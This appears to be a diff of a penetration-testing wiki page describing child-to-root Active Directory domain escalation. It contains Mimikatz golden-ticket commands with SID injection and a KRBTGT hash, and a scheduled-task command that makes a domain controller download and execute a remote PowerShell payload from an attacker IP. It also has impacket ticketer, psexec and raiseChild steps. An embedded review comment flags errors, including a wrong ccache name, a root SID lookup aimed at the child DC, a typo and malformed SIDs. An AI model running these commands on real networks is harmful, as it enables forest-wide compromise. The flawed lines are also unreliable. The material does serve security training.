ls \\mcorp-dc.moneycorp.local\c$
|
ls \\mcorp-dc.moneycorp.local\c$
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
|
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```bash
|
```bash
|
||||||
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
|
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||||
|
|
||||||
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
|
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||||
|
|
||||||
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
|
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
|
||||||
|
|
||||||
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
|
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
|
||||||
|
|
||||||
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
With the acquired permissions from the attack you can execute for example a DCSync attack in the new domain:
|
||||||
|
|
||||||
|
{% content-ref url="dcsync.md" %}
|
||||||
|
[dcsync.md](dcsync.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
### From linux
|
||||||
|
|
||||||
|
#### Manual with [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
# This is for an attack from child to root domain
|
||||||
|
# Get child domain SID
|
||||||
|
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
|
||||||
|
# Get root domain SID
|
||||||
|
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"
|
||||||
|
|
||||||
|
# Generate golden ticket
|
||||||
|
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator
|
||||||
|
|
||||||
|
# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
|
||||||
|
# JUST USE THE SAME USERNAME IN THE NEXT STEPS
|
||||||
|
|
||||||
|
# Load ticket
|
||||||
|
export KRB5CCNAME=hacker.ccache
|
||||||
|
|
||||||
|
# psexec in domain controller of root
|
||||||
|
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
#### Automatic using [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)
|
||||||
|
|
||||||
|
This is an Impacket script which will **automate escalating from child to parent domain**. The script needs:
|
||||||
|
|
||||||
|
* Target domain controller
|
||||||
|
* Creds for an admin user in the child domain
|
||||||
|
|
||||||
|
The flow is:
|
||||||
|
|
||||||
|
* Obtains the SID for the Enterprise Admins group of the parent domain
|
||||||
|
* Retrieves the hash for the KRBTGT account in the child domain
|
||||||
|
* Creates a Golden Ticket
|
||||||
|
* Logs into the parent domain
|
||||||
|
* Retrieves credentials for the Administrator account in the parent domain
|
||||||
|
* If the `target-exec` switch is specified, it authenticates to the parent domain's Domain Controller via Psexec.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
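Review bot: in the new `From linux` block the ticket is loaded with `export KRB5CCNAME=hacker.ccache`, but ticketer.py saves the forged ticket as `<username>.ccache`, so with `Administrator` as the user this must be `Administrator.ccache` (the comment `JUST USE THE SAME USERNAME IN THE NEXT STEPS` hints at exactly this). Second, `# Get root domain SID` runs `lookupsid.py <child_domain>/username@10.10.10.10`, the same child DC as the line above, and greps for `Enterprise Admins`; that group (RID 519) exists only in the forest root domain, so this call has to target the root DC (or read the root SID from the trust object), and the `psexec.py ... -target-ip 10.10.10.10` line below reuses that same child-DC placeholder for the root DC. Smaller items in the unchanged context: `/SC Weekely` in the schtasks line should be `Weekly`, and the SIDs in the `Invoke-Mimikatz` golden-ticket line are missing hyphens (`S-1-5-211874506631-...` and `...-1496970234700767426-519`).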
@ -115,7 +115,7 @@ c:\Users\Public>
|
||||||
|
|
||||||
### Launch a new CMD (if you have RDP access)
|
### Launch a new CMD (if you have RDP access)
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (37) (1).png>)
|
![](<../../.gitbook/assets/image (37).png>)
|
||||||
|
|
||||||
## CLSID Problems
|
## CLSID Problems
|
||||||
|
|
||||||
|
|